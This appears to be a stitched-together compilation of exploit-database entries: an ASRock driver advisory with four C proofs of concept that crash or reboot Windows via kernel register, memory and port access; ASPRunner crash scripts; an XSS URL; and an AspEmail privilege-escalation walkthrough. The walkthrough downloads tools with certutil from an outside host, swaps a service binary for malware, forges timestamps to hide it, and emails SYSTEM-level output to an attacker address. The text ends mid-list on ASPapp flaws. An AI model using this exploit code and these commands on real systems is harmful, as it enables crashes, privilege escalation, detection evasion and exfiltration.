ASRock's RBGLED, A-Tuning, F-Stream, RestartToUEFI, and possibly others,
use a low level driver to program and query the status on embedded ICs
on their hardware. Fan curves, clock frequencies, LED colors, thermal
performance, and other user customizable properties and monitoring
functionality are exposed to applications through this low level kernel
driver.
The main subjects of this advisory are the device drivers
installed/loaded by these utilities (AsrDrv101.sys and ArsDrv102.sys).
>From now on addressed as "AsrDrv". Default installation allows
non-privileged user processes (even running at LOW INTEGRITY) to get a
HANDLE and issue IOCTL codes to the driver.
The following sections describe the problems found.
7.1. *CR register access*
[CVE-2018-10709]
AsrDrv exposes functionality to read and write CR register values. This
could be leveraged in a number of ways to ultimately run code with
elevated privileges.
/-----
// Asrock RGBLED PoC demonstrating non-privileged access to CR registers
#include <windows.h>
#include <stdio.h>
#define IOCTL_ASROCK_READCR 0x22286C
#define IOCTL_ASROCK_WRITECR 0x222870
HANDLE ghDriver = 0;
#pragma pack (push,1)
typedef struct _ASROCK_CR_STRUCT {
ULONG64 reg;
ULONG64 value;
} ASROCK_CR_STRUCT;
#pragma pack(pop)
#define IOCTLMACRO(iocontrolcode, size) \
ULONG64 outbuffer[2] = { 0 }; \
DWORD returned = 0; \
DeviceIoControl(ghDriver, ##iocontrolcode##, (LPVOID)&inbuffer, ##size##, (LPVOID)outbuffer, sizeof(outbuffer), &returned, NULL); \
return outbuffer[1]; \
ULONG64 ASROCK_ReadCR(DWORD reg)
{
ASROCK_CR_STRUCT inbuffer = { 3, 0};
IOCTLMACRO(IOCTL_ASROCK_READCR, 10)
}
ULONG64 ASROCK_WriteCR(DWORD reg, ULONG64 value)
{
ASROCK_CR_STRUCT inbuffer = { reg, value};
IOCTLMACRO(IOCTL_ASROCK_WRITECR, 10)
}
BOOL InitDriver()
{
char szDeviceName[] = "\\\\.\\AsrDrv101";
ghDriver = CreateFile(szDeviceName, GENERIC_READ | GENERIC_WRITE, FILE_SHARE_READ | FILE_SHARE_WRITE, 0, OPEN_EXISTING, FILE_ATTRIBUTE_NORMAL, NULL);
if (ghDriver == INVALID_HANDLE_VALUE) {
printf("Cannot get handle to driver object \'%s\'- GetLastError:%d\n", szDeviceName, GetLastError());
return FALSE;
}
return TRUE;
}
int main(int argc, char* argv[])
{
printf("Asrock RGBLED PoC (CR access) - pnx!/CORE\n");
if (!InitDriver()) {
printf("InitDriver failed! - aborting...\n");
exit(0);
}
ULONG64 a = ASROCK_ReadCR(3);
printf("CR3 (PageDir): %llx\n", a);
printf("press ENTER for instant system CRASH\n");
getchar();
a = ASROCK_WriteCR(3, 0xffff1111ffff2222);
CloseHandle(ghDriver);
}
-----/
7.2. *Arbitrary physical memory read/write*
[CVE-2018-10710]
AsrDrv's IOCTL code 0x22280C exposes a functionality to read and write
arbitrary physical memory, this could be leveraged by a local attacker
to elevate privileges.
Proof of Concept:
/-----
// Asrock RGBLED PoC (arbitrary physical memory write)
// This PoC demonstrates arbitrary write to physical memory.
#include <windows.h>
#include <stdio.h>
#define IOCTL_ASROCK_WRITEPH 0x22280C
HANDLE ghDriver = 0;
#pragma pack (push,1)
typedef struct _ASROCK_PH_STRUCT {
ULONG64 destPhysical;
DWORD size;
DWORD unk0;
ULONG64 src;
} ASROCK_PH_STRUCT;
#pragma pack(pop)
BOOL ASROCK_ph_memcpy(ULONG64 dest, ULONG64 src, DWORD size)
{
ASROCK_PH_STRUCT mystructIn = { dest, size, 0, src};
BYTE outbuffer[0x30] = { 0 };
DWORD returned = 0;
DeviceIoControl(ghDriver, IOCTL_ASROCK_WRITEPH, (LPVOID)&mystructIn, sizeof(mystructIn), (LPVOID)outbuffer, sizeof(outbuffer), &returned, NULL);
if (returned) {
return TRUE;
}
return FALSE;
}
BOOL InitDriver()
{
char szDeviceName[] = "\\\\.\\AsrDrv101";
ghDriver = CreateFile(szDeviceName, GENERIC_READ | GENERIC_WRITE, FILE_SHARE_READ | FILE_SHARE_WRITE, 0, OPEN_EXISTING, FILE_ATTRIBUTE_NORMAL, NULL);
if (ghDriver == INVALID_HANDLE_VALUE) {
printf("Cannot get handle to driver \'%s\'- GetLastError:%d\n", szDeviceName, GetLastError());
return FALSE;
}
return TRUE;
}
int main(int argc, char * argv[])
{
printf("Asrock RGBLED PoC (arbitrary physical memory write) - pnx!/CORE\n");
if (!InitDriver()) {
exit(0);
}
printf("press ENTER for SYSTEM CRASH\n");
getchar();
ULONG64 data = 0xFFFF1111FFFF2222;
for (unsigned int i = 0; i < 0xffffffff; i += 0x1000) {
printf(".");
ASROCK_ph_memcpy(i, (ULONG64)&data, 8);
}
CloseHandle(ghDriver);
return 0;
}
-----/
7.3. *MSR Register access*
[CVE-2018-10711]
AsrDrv exposes functionality to read and write Machine Specific
Registers (MSRs). This could be leveraged to execute arbitrary ring-0
code.
Proof of Concept:
/-----
// Asrock RGBLED PoC demonstrating non-privileged access to MSR registers
// This PoC demonstrates non privileged MSR access by reading
// IA32_LSTAR value (leaks a kernel function pointer bypassing KASLR)
// and then writing garbage to it (instant BSOD!)
#include <windows.h>
#include <stdio.h>
#define IOCTL_ASROCK_RDMSR 0x222848
#define IOCTL_ASROCK_WRMSR 0x22284C
HANDLE ghDriver = 0;
#pragma pack (push,1)
typedef struct _ASROCK_MSRIO_STRUCT {
ULONG64 valLO; //
DWORD reg; //
ULONG64 valHI; //
} ASROCK_MSRIO_STRUCT;
#pragma pack(pop)
#define IOCTLMACRO(iocontrolcode, size) \
ASROCK_MSRIO_STRUCT outbuffer = { 0 };\
DWORD returned = 0; \
DeviceIoControl(ghDriver, ##iocontrolcode##, (LPVOID)&inbuffer, ##size##, (LPVOID)&outbuffer, sizeof(outbuffer), &returned, NULL); \
return (outbuffer.valHI<<0x20 | outbuffer.valLO); \
ULONG64 GIO_RDMSR(DWORD reg)
{
ASROCK_MSRIO_STRUCT inbuffer = { 0, reg };
IOCTLMACRO(IOCTL_ASROCK_RDMSR, 20)
}
ULONG64 GIO_WRMSR(DWORD reg, ULONG64 value)
{
ASROCK_MSRIO_STRUCT inbuffer = { value & 0xffffffff, reg, (value & 0xffffffff00000000)>>0x20 };
IOCTLMACRO(IOCTL_ASROCK_WRMSR, 20)
}
BOOL InitDriver()
{
char szDeviceName[] = "\\\\.\\AsrDrv101";
ghDriver = CreateFile(szDeviceName, GENERIC_READ | GENERIC_WRITE, FILE_SHARE_READ | FILE_SHARE_WRITE, 0, OPEN_EXISTING, FILE_ATTRIBUTE_NORMAL, NULL);
if (ghDriver == INVALID_HANDLE_VALUE) {
printf("Cannot get handle to driver object \'%s\'- GetLastError:%d\n", szDeviceName, GetLastError());
return FALSE;
}
return TRUE;
}
int main(int argc, char * argv[])
{
printf("Asrock RGBLED PoC (MSR access) - pnx!/CORE\n");
if (!InitDriver()) {
printf("InitDriver failed! - aborting...\n");
exit(0);
}
ULONG64 a = GIO_RDMSR(0xC0000082);
printf("IA322_LSTAR: %llx (nt!KiSystemCall64)\n", a);
printf("press ENTER for instant BSOD\n");
getchar();
a = GIO_WRMSR(0xC0000082, 0xffff1111ffff2222);
return (int)CloseHandle(ghDriver);
}
-----/
7.4. *Port mapped I/O access*
[CVE-2018-10712]
AsrDrv exposes functionality to read/write data from/to IO ports. This
could be leveraged in a number of ways to ultimately run code with
elevated privileges.
/-----
// Asrock RGBLED PoC demonstrating non-privileged access to IO ports
#include <windows.h>
#include <stdio.h>
#define IOCTL_ASROCK_PORTREADB 0x222810
#define IOCTL_ASROCK_PORTWRITEB 0x222814
HANDLE ghDriver = 0;
#pragma pack (push,1)
typedef struct _ASROCK_CR_STRUCT {
DWORD port;
ULONG64 value;
} ASROCK_CR_STRUCT;
#pragma pack(pop)
#define IOCTLMACRO(iocontrolcode, size) \
BYTE outbuffer[0x10] = { 0 }; \
DWORD returned = 0; \
DeviceIoControl(ghDriver, ##iocontrolcode##, (LPVOID)&inbuffer, ##size##, (LPVOID)outbuffer, sizeof(outbuffer), &returned, NULL); \
return outbuffer[1]; \
BYTE ASROCK_ReadPortB(DWORD port)
{
ASROCK_CR_STRUCT inbuffer = { port, 0};
IOCTLMACRO(IOCTL_ASROCK_PORTREADB, 10)
}
BYTE ASROCK_WritePortB(DWORD port, ULONG64 value)
{
ASROCK_CR_STRUCT inbuffer = { port, value};
IOCTLMACRO(IOCTL_ASROCK_PORTWRITEB, 10)
}
void Reboot()
{
BYTE cf9 = ASROCK_ReadPortB(0xcf9) & ~0x6;
ASROCK_WritePortB(0xcf9, cf9 | 2);
Sleep(50);
ASROCK_WritePortB(0xcf9, cf9 | 0xe);
Sleep(50);
}
BOOL InitDriver()
{
char szDeviceName[] = "\\\\.\\AsrDrv101";
ghDriver = CreateFile(szDeviceName, GENERIC_READ | GENERIC_WRITE, FILE_SHARE_READ | FILE_SHARE_WRITE, 0, OPEN_EXISTING, FILE_ATTRIBUTE_NORMAL, NULL);
if (ghDriver == INVALID_HANDLE_VALUE) {
printf("Cannot get handle to driver object \'%s\'- GetLastError:%d\n", szDeviceName, GetLastError());
return FALSE;
}
return TRUE;
}
int main(int argc, char * argv[])
{
printf("Asrock RGBLED PoC (PMIO access) - pnx!/CORE\n");
if (!InitDriver()) {
printf("InitDriver failed! - aborting...\n");
exit(0);
}
Reboot();
return (int)CloseHandle(ghDriver);
}
-----/
8. *Report Timeline*
2018-03-12: SecureAuth sent an initial notification to ASRock America
Support.
2018-03-13: ASRock confirmed the receipt and requested additional
information in order to send it to its HQ.
2018-03-13: SecureAuth answered saying that a draft advisory has been
written, including a technical description, and requested for PGP keys
in order to send it encrypted.
2018-03-14: ASRock answered asking for the advisory in clear text.
2018-03-14: SecureAuth sent the draft advisory to ASRock in clear text
form.
2018-03-14: ASRock confirmed the receipt and informed they would submit
it to the HQ for validation.
2018-03-23: SecureAuth requested a status update on the case.
2018-03-23: ASRock answered saying they didn't have a reply from HQ.
2018-03-26: ASRock notified SecureAuth they were still checking the
reported vulnerabilities and requested additional time.
2018-03-27: SecureAuth thanked the status update and informed ASRock
that would be in contact the following week.
2018-03-28: ASRock informed SecureAuth they checked the reported
vulnerabilities and they would have a preliminary schedule for the fix
at the end of April.
2018-03-28: SecureAuth thanked ASRock's reply.
2018-04-20: ASRock notified that the driver was modified and sent to
SecureAuth the fixed applications and requested for a feedback.
2018-04-23: SecureAuth acknowledged the reception of the fixed
applications.
2018-05-09: SecureAuth tested the modified driver and verified that the
issues detailed in the proofs of concept were solved.
For that reason, SecureAuth propose release date to be May 23rd.
2018-05-09: ASRock thanked SecureAuth's update and forwarded the
proposal to its HQ for a confirmation.
2018-05-15: ASRock notified SecureAuth that they were going to deploy
the new driver architecture into each ASRock utility.
For the whole project, ASRock estimated to finish by the end of June.
2018-05-15: SecureAuth thanked ASRock's update and asked if ASRock had
planned to release a security note.
2018-05-23: ASRock informed that each utility would include a release
note with a security description.
2018-06-15: SecureAuth requested ASRock a status update about its
timescale.
2018-06-09: ASRock forwarded the request to its HQ.
2018-06-19: ASRock informed that they had started to upload the fixed
drivers for one of the supported motherboard series
and they were going to continue uploading the drivers for other models.
2018-07-11: SecureAuth requested ASRock a status update.
2018-07-11: ASRock replied saying they were still working on the upload
process.
2018-08-06: SecureAuth requested ASRock a new status update.
2018-08-16: ASRock notified SecureAuth they had finished with the update
process.
2018-10-17: SecureAuth set October 25th as the publication date.
2018-10-25: Advisory CORE-2018-0005 published.
9. *References*
[1] http://www.asrock.com/
10. *About SecureAuth Labs*
SecureAuth Labs, the research arm of SecureAuth Corporation, is charged
with anticipating the future needs and requirements for information
security technologies. We conduct research in several important areas of
computer security, including identity-related attacks, system
vulnerabilities and cyber-attack planning. Research includes problem
formalization, identification of vulnerabilities, novel solutions and
prototypes for new technologies. We regularly publish security
advisories, primary research, technical publications, research blogs,
project information, and shared software tools for public use at
http://www.secureauth.com.
11. *About SecureAuth*
SecureAuth is leveraged by leading companies, their employees, their
customers and their partners to eliminate identity-related breaches.
As a leader in access management, identity governance, and penetration
testing, SecureAuth is powering an identity security revolution by
enabling people and devices to intelligently and adaptively access
systems and data, while effectively keeping bad actors from doing harm.
By ensuring the continuous assessment of risk and enablement of trust,
SecureAuth's highly flexible Identity Security Automation (ISA) platform
makes it easier for organizations to prevent the misuse of credentials
and exponentially reduce the enterprise threat surface. To learn more,
visit www.secureauth.com<http://www.secureauth.com>, call (949) 777-6959, or email us at
info@secureauth.com<mailto:info@secureauth.com>
12. *Disclaimer*
The contents of this advisory are copyright (c) 2018 SecureAuth, and are
licensed under a Creative Commons Attribution Non-Commercial Share-Alike
3.0 (United States) License:
http://creativecommons.org/licenses/by-nc-sa/3.0/us/
#Exploit Title: ASPRunner.NET 10.1 - Denial of Service (PoC)
#Discovery by: Victor Mondragón
#Discovery Date: 2019-05-09
#Vendor Homepage: https://xlinesoft.com/
#Software Link: https://xlinesoft.com/asprunnernet/download.htm
#Tested Version: 10.1
#Tested on: Windows 7 Service Pack 1 x64
#Steps to produce the crash:
#1.- Run python code: ASPRunner_net_10_1.py
#2.- Open ASPRunner_10_1.txt and copy content to clipboard
#3.- Open ASPRunner.NET
#4.- Click on "Next" > Select "SQLite" database > click on "Next"
#5.- Click on "Create new database"
#6.- In "Table name" field Paste Clipboarad
#7.- Click on "Create table"
#8.- Crashed
cod = "\x41" * 10000
f = open('ASPRunner_10_1.txt', 'w')
f.write(cod)
f.close()
# Exploit Title: ASPRunner Professional v6.0.766 - Denial of Service (PoC)
# Discovery by: Rafael Pedrero
# Discovery Date: 2019-01-30
# Vendor Homepage: http://www.xlinesoft.com/asprunnerpro
# Software Link : http://www.xlinesoft.com/asprunnerpro
# Tested Version: v6.0.766
# Tested on: Windows XP SP3
# Vulnerability Type: Denial of Service (DoS) Local Buffer Overflow
# Steps to Produce the Crash:
# 1.- Run AspRunnerPro.exe
# 2.- copy content AspRunnerPro_Crash.txt or 180 "A" to clipboard (result from this python script)
# 3.- Go to Wizard "Create a new project" - in "Project name:" field paste the result (180 "A" or more)
# 4.- Click in Next button and you will see a crash.
#!/usr/bin/env python
crash = "\x41" * 180
f = open ("AspRunnerPro_Crash.txt", "w")
f.write(crash)
f.close()
source: https://www.securityfocus.com/bid/49674/info
Aspgwy Access is prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input.
An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks.
Aspgwy Access 1.0.0 is vulnerable; other versions may also be affected.
http://www.example.com/forum/search_results.asp?search_word=&matchword=[XSS]
####################################################################################################################
# Exploit Title: AspEmail 5.6.0.2 - Local Privilege Escalation #
# Vulnerability Category: [Weak Services Permission - Binary Permission Vulnerability] #
# Date: 13/04/2023 #
# Exploit Author: Zer0FauLT [admindeepsec@proton.me] #
# Vendor Homepage: https://www.aspemail.com #
# Software Link: https://www.aspemail.com/download.html #
# Product: AspEmail #
# Version: AspEmail 5.6.0.2 and all #
# Platform - Architecture : Windows - 32-bit | 64-bit | Any CPU #
# Tested on: Windows Server 2016 and Windows Server 2019 #
# CVE : 0DAY #
####################################################################################################################
# ==================================================================================================================
[+] C:\PenTest>whoami /priv
PRIVILEGES INFORMATION
----------------------
Privilege Name Description State
============================= ========================================= ========
SeIncreaseQuotaPrivilege Adjust memory quotas for a process Disabled
SeChangeNotifyPrivilege Bypass traverse checking Enabled
SeImpersonatePrivilege Impersonate a client after authentication Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set Disabled
# ==================================================================================================================
* First, we will test whether the AspEmail service is active.
* First of all, we perform a query to list the processes running in the system with normal user rights and test whether the process of the relevant service is running:
[+] C:\PenTest>tasklist /svc | findstr EmailAgent.exe
EmailAgent.exe 4400 Persits Software EmailAgent
or
[+] C:\PenTest>tasklist /svc | findstr EmailAgent64.exe
EmailAgent64.exe 4400 Persits Software EmailAgent
* We have detected that the process of the "Persits Software Email Agent" Service is state "RUNNING".
* Now we know that AspEmail service is active.
# ==================================================================================================================
* We will need these:
[+] C:\PenTest>certutil -urlcache -split -f http://10.1.11.21/EmailAgent.exe "C:\Program Files (x86)\Persits Software\AspEmail\BIN\EmailAgentPrivESC.exe" <<<=== MyExploit
[+] C:\PenTest>certutil -urlcache -split -f http://10.1.11.21/nircmd.exe "C:\Program Files (x86)\Persits Software\AspEmail\BIN\nircmd.exe"
[+] C:\PenTest>certutil -urlcache -split -f http://10.1.11.21/Mail.exe "C:\Windows\Temp\Mail.exe"
[+] C:\PenTest>certutil -urlcache -split -f http://10.1.11.21/Run.exe "C:\Windows\Temp\Run.bat"
[+] C:\PenTest>certutil -urlcache -split -f http://10.1.11.21/PrivescCheck.ps1 "C:\PenTest\PrivescCheck.ps1"
# ==================================================================================================================
[+] C:\PenTest>powershell -ep bypass -c ". .\PrivescCheck.ps1; Invoke-PrivescCheck"
Name: Persits Software EmailAgent
ImagePath : "C:\Program Files (x86)\Persits Software\AspEmail\BIN\Email
Agent.exe" /run
User : LocalSystem
ModifiablePath : C:\Program Files (x86)\Persits Software\AspEmail\BIN
IdentityReference : Everyone
Permissions : WriteOwner, Delete, WriteAttributes, Synchronize, ReadControl, ReadData/ListDirectory,
AppendData/AddSubdirectory, WriteExtendedAttributes, WriteDAC, ReadAttributes, WriteData/AddFile,
ReadExtendedAttributes, DeleteChild, Execute/Traverse
Status : Unknown
UserCanStart : False
UserCanStop : False
[+] C:\PenTest>del PrivescCheck.ps1
* We detected "Persits Software EmailAgent" Service "Binary Permission Vulnerability" in our checks.
# ================================================================================================================== #
[+] C:\PenTest>ICACLS "C:\Program Files (x86)\Persits Software\AspEmail"
Successfully processed 0 files; Failed processing 1 files
C:\Program Files (x86)\Persits Software\AspEmail: Access is denied.
* We do not have permission to access subdirectories.
# ==================================================================================================================
[+] C:\PenTest>ICACLS "C:\Program Files (x86)\Persits Software\AspEmail\BIN"
C:\Program Files (x86)\Persits Software\AspEmail\BIN Everyone:(OI)(CI)(F)
DeepSecLab\psacln:(I)(OI)(CI)(N)
DeepSecLab\psaadm:(I)(OI)(CI)(N)
DeepSecLab\psaadm_users:(I)(OI)(CI)(N)
BUILTIN\Administrators:(I)(F)
CREATOR OWNER:(I)(OI)(CI)(IO)(F)
APPLICATION PACKAGE AUTHORITY\ALL RESTRICTED APPLICATION PACKAGES:(I)(OI)(CI)(RX)
NT SERVICE\TrustedInstaller:(I)(CI)(F)
NT AUTHORITY\SYSTEM:(I)(OI)(CI)(F)
BUILTIN\Administrators:(I)(OI)(CI)(IO)(F)
BUILTIN\Users:(I)(OI)(CI)(RX)
APPLICATION PACKAGE AUTHORITY\ALL APPLICATION PACKAGES:(I)(OI)(CI)(RX)
* Unlike other directories, we have full privileges in the "BIN" directory of the service.
* This is chmod 0777 - rwxrwxrwx in linux language.
# ==================================================================================================================
[+] C:\PenTest>WMIC Path Win32_LogicalFileSecuritySetting WHERE Path="C:\\Program Files (x86)\\Persits Software\\AspEmail\\Bin\\EmailAgent.exe" ASSOC /RESULTROLE:Owner /ASSOCCLASS:Win32_LogicalFileOwner /RESULTCLASS:Win32_SID
__PATH
\\DeepSecLab\root\cimv2:Win32_LogicalFileSecuritySetting.Path="C:\\Program Files (x86)\\Persits Software\\AspEmail\\Bin\\EmailAgent.exe"
\\DeepSecLab\root\cimv2:Win32_SID.SID="S-1-5-32-544"
root\cimv2 DeepSecLab {} 5 Win32_SID.SID="S-1-5-32-544" Win32_SID Win32_SID 2 Administrators {1, 2, 0, 0, 0, 0, 0, 5, 32, 0, 0, 0, 32, 2, 0, 0} BUILTIN S-1-5-32-544 16
[EmailAgent.exe] ===>>> Owner: BUILTIN\Administrators
* We understood "EmailAgent.exe" processor was installed by the Administrator and the owner is the Administrator user.
# ==================================================================================================================
* Now we will take ownership of this directory as we will execute our operations under the "BIN" directory.
[+] C:\PenTest>whoami
DeepSecLab\Hacker
[+] C:\PenTest>takeown /f "C:\Program Files (x86)\Persits Software\AspEmail\BIN"
SUCCESS: The file (or folder): "C:\Program Files (x86)\Persits Software\AspEmail\BIN" now owned by user "DeepSecLab\Hacker".
[+] C:\PenTest>ICACLS "C:\Program Files (x86)\Persits Software\AspEmail\BIN" /Grant DeepSecLab\Hacker:F
processed file: C:\Program Files (x86)\Persits Software\AspEmail\BIN
Successfully processed 1 files; Failed processing 0 files
* Ok. All commands resulted successfully. We now have full privileges for this directory.
# ==================================================================================================================
* Now we will modify the EmailAgent file and inject a self-written malware.
* We will be careful not to damage any files while doing this so that all transactions can be easily undone.
[+] C:\Program Files (x86)\Persits Software\AspEmail\BIN>ren EmailAgent.exe Null.EmailAgent.exe
[+] C:\Program Files (x86)\Persits Software\AspEmail\BIN>ren EmailAgentPrivESC.exe EmailAgent.exe
# ==================================================================================================================
[+] C:\Program Files (x86)\Persits Software\AspEmail\Bin>dir
Volume in drive C has no label.
Volume Serial Number is 0C8A-5291
Directory of C:\Program Files (x86)\Persits Software\AspEmail\Bin
14.04.2023 16:47 <DIR> .
14.04.2023 16:47 <DIR> ..
01.03.2004 15:55 143.360 AspEmail.dll
25.02.2004 16:23 188.416 AspUpload.dll
13.04.2023 22:00 12.288 EmailAgent.exe <<<=== ReNamed for EmailAgentPrivESC.exe
24.09.2003 09:22 139.264 EmailAgentCfg.cpl
24.09.2003 09:25 94.208 EmailLogger.dll
24.09.2003 09:21 167.936 Null.EmailAgent.exe
6 File(s) 745.472 bytes
2 Dir(s) 165.936.717.824 bytes free
# ==================================================================================================================
* We are now making the settings on Last Modified Date, Creation Date and Last Accessed Date.
[+] C:\Program Files (x86)\Persits Software\AspEmail\BIN>nircmd.exe setfiletime "EmailAgent.exe" "24.03.2007 09:21:30" "24.03.2007 09:21:30" "23.05.2017 06:42:28"
[+] C:\Program Files (x86)\Persits Software\AspEmail\BIN>del nircmd.exe
* And next is we are making extracting the real EmailAgent.exe file icon and changing the icon for exploit. This way, we will make it harder to detect.
* I used the Resource Tuner Console tool.
>>> http://www.restuner.com/tour-resource-tuner-console.htm
* This can be done easily with the Resource Tuner tool.
>>> http://www.resource-editor.com/how-to-change-icons-in-exe.html
>>> http://www.restuner.com/download.htm
# ==================================================================================================================
[+] C:\Program Files (x86)\Persits Software\AspEmail\Bin>dir
Volume in drive C has no label.
Volume Serial Number is 0C8A-5291
Directory of C:\Program Files (x86)\Persits Software\AspEmail\Bin
14.04.2023 16:47 <DIR> .
14.04.2023 16:47 <DIR> ..
01.03.2004 15:55 143.360 AspEmail.dll
25.02.2004 16:23 188.416 AspUpload.dll
24.09.2003 09:21 12.288 EmailAgent.exe
24.09.2003 09:22 139.264 EmailAgentCfg.cpl
24.09.2003 09:25 94.208 EmailLogger.dll
24.09.2003 09:21 167.936 Null.EmailAgent.exe
6 File(s) 745.472 bytes
2 Dir(s) 165.936.717.824 bytes free
[24.09.2003 09:21] 12.288 EmailAgent.exe
[24.09.2003 09:21] 167.936 Null.EmailAgent.exe
* And time manipulation is over. They look like they were uploaded at the same time long ago.
# ==================================================================================================================
* Now we check for my malware ownership.
[+] C:\PenTest>WMIC Path Win32_LogicalFileSecuritySetting WHERE Path="C:\\Program Files (x86)\\Persits Software\\AspEmail\\Bin\\EmailAgent.exe" ASSOC /RESULTROLE:Owner /ASSOCCLASS:Win32_LogicalFileOwner /RESULTCLASS:Win32_SID
__PATH
\\DeepSecLab\root\cimv2:Win32_LogicalFileSecuritySetting.Path="C:\\Program Files (x86)\\Persits Software\\AspEmail\\Bin\\EmailAgent.exe"
\\DeepSecLab\root\cimv2:Win32_SID.SID="S-1-5-21-3674093405-176013069-2091862131-1511" root\cimv2 DeepSecLab {} 5 Win32_SID.SID="S-1-5-21-3674093405-176013069-2091862131-1511" Win32_SID Win32_SID 2 Hacker {1, 5, 0, 0, 0, 0, 0, 5, 21, 0, 0, 0, 93, 55, 254, 218, 13, 191, 125, 10, 115, 72, 175, 124, 231, 5, 0, 0} DeepSecLab S-1-5-21-3674093405-176013069-2091862131-1511 28
[+] C:\PenTest>WMIC UserAccount WHERE sid="S-1-5-21-3674093405-176013069-2091862131-1511" GET Name
Name
DeepSecLab\Hacker
EmailAgent.exe Owner: DeepSecLab\Hacker
# =================================================================================================================#
# #
####################################################################################################################
# #[EmailAgent.cs]# #
####################################################################################################################
# #
#
* We program this malware in such a way that when the server is reboot(when the services are restarted), #
* It will be triggered and execute the codes we want, #
* And then send a printout of all this to the email address we specified. #
#
using System; #
using System.Linq; #
using System.Text; #
using System.Diagnostics; #
using System.IO; #
using System.Collections; #
#
Namespace CliToolSpace #
{ #
class _Main #
{ #
static void Main(string[] args) #
{ #
Cli commandLine = new Cli(); #
commandLine.FileToCli(@"C:\Windows\Temp\Mail.exe & C:\Windows\Temp\Run.bat"); #
commandLine.Execute(); #
commandLine.ToFile(@"C:\Windows\Temp\"); #
} #
} #
} #
#
# #
####################################################################################################################
# #[Mail.cs]# #
####################################################################################################################
# #
#
using System; #
using System.Net.Mail; #
using System.Net; #
SmtpClient SmtpServer = new SmtpClient("smtp.deepseclab.com"); #
var mail = new MailMessage(); #
mail.From = new MailAddress("mail@deepseclab.com"); #
mail.To.Add("mail@hacker.com"); #
mail.Subject = "Trigger Successful!"; #
mail.IsBodyHtml = true; #
string htmlBody; #
htmlBody = "<strong>This server has been rebooted.</strong>"; #
mail.Body = htmlBody; #
Attachment attachment; #
attachment = new Attachment(@"C:\Windows\Temp\Export.txt"); #
mail.Attachments.Add(attachment); #
SmtpServer.Port = 587; #
SmtpServer.UseDefaultCredentials = false; #
SmtpServer.Credentials = new System.Net.NetworkCredential("mail@deepseclab.com","p@ssw0rd123"); #
SmtpServer.EnableSsl = true; #
SmtpServer.Timeout = int.MaxValue; #
SmtpServer.Send(mail); #
#
# #
####################################################################################################################
# #[Run.bat]# #
####################################################################################################################
# #
#
whoami > C:\Windows\Temp\Export.txt #
cd C:\Program Files (x86)\Persits Software\AspEmail\Bin #
del EmailAgent.exe & ren Null.EmailAgent.exe EmailAgent.exe #
cd c:\Windows\Tasks #
del Run.bat & del Mail.exe #
#
# #
####################################################################################################################
# #
[+]Trigger Successful![+] #
#
[+] C:\PenTest>systeminfo | findstr "Boot Time" #
System Boot Time: 13.04.2022, 07:46:06 #
#
# #
####################################################################################################################
#[Export.txt]# #
####################################################################################################################
# #
#
NT AUTHORITY\SYSTEM #
#
# #
####################################################################################################################
# #
# ==================================================================================================================
# ...|||[FIX]|||... #
# ==================================================================================================================
# [+] C:\>Runas /profile /user:DeepSecLab\Administrator CMD [+] #
# =================================================================================================================#
[+] C:\Administrator>sc qc "Persits Software EmailAgent"
[SC] QueryServiceConfig SUCCESS
SERVICE_Name: Persits Software EmailAgent
TYPE : 10 WIN32_OWN_PROCESS
START_TYPE : 2 AUTO_START
ERROR_CONTROL : 1 NORMAL
BINARY_PATH_Name : "C:\Program Files (x86)\Persits Software\AspEmail\BIN\EmailAgent.exe" /run
LOAD_ORDER_GROUP :
TAG : 0
DISPLAY_Name : Persits Software EmailAgent
DEPENDENCIES : rpcss
SERVICE_START_Name : LocalSystem
# ==================================================================================================================
[+] C:\Administrator>sc sdshow "Persits Software EmailAgent"
D:(A;;CCLCSWRPWPDTLOCRRC;;;SY)(A;;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;BA)(A;;CCLCSWLOCRRC;;;IU)(A;;CCLCSWLOCRRC;;;SU)S:(AU;FA;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;WD)
# ==================================================================================================================
[+] C:\Administrator>accesschk64.exe -wuvc "Persits Software EmailAgent" -accepteula
Accesschk v6.15 - Reports effective permissions for securable objects
Copyright (C) 2006-2022 Mark Russinovich
Sysinternals - www.sysinternals.com
Persits Software EmailAgent
Medium Mandatory Level (Default) [No-Write-Up]
RW NT AUTHORITY\SYSTEM
SERVICE_ALL_ACCESS
RW BUILTIN\Administrators
SERVICE_ALL_ACCESS
# ==================================================================================================================
[+] C:\Administrator>ICACLS "C:\Program Files (x86)\Persits Software" /T /Q /C /RESET
[+] C:\PenTest>ICACLS "C:\Program Files (x86)\Persits Software\AspEmail\BIN"
Successfully processed 0 files; Failed processing 1 files
C:\Program Files (x86)\Persits Software\AspEmail\Bin: Access is denied.
DONE!
# ==================================================================================================================
[+] C:\Administrator>sc stop "Persits Software EmailAgent"
[+] PS C:\Administrator> Start-Service -Name "Persits Software EmailAgent"
* These commands are optional. Used to stop the "Persits Software EmailAgent" service. We fixed the vulnerability and I don't think it's necessary anymore.
# ==================================================================================================================
ASPapp Multiple Vulnerabilities
Vendor: ASPapp.com
Product: ASPapp
Version: Multple Products
Website: http://www.aspapp.com/
BID: 9250
Description:
A complete, easy-to-modify .asp portal system. With this portal you can manage users, content, links, files, forums, surveys, product catalog, shopping cart, PayPal or Authorize.net e-commerce, classifieds, calendar, downloads, images, surveys, faq's, news, and more. Currently it is one of the most popular .ASP scripts at HotScripts.com The below vulnerabilities also affect IntranetApp and ProjectApp, as the codebase is almost identical.
Privilege Escalation Vulnerability:
When registering account a malicious user can set themselves to any user level they desire. The user level is determined by a hidden form field value titled "accesslevel". If a user sets themselves to the "Super Admin" level [4] they can pretty much take over the entire portal. They can also view other user's passes in plaintext via the "User Admin" feature by viewing the HTML source. This does not seem to be present in IntranetApp, but is present in PortalApp and ProjectApp.
Account Hijacking Vulnerability:
Once again ASP App software relies on hidden form fields to determine user values. By changing the "user_id" field when editing their profile a malicious user can reset passwords for arbitrary accounts and edit their user info etc. This is present in all three applications.
Cross Site Scripting:
XSS is possible on any page of an ASP APP Portal by appending the variable "msg" with a value of any script you would like to be run. This vulnerability also exists in all 3 applications.
Code Injection Vulnerabilities:
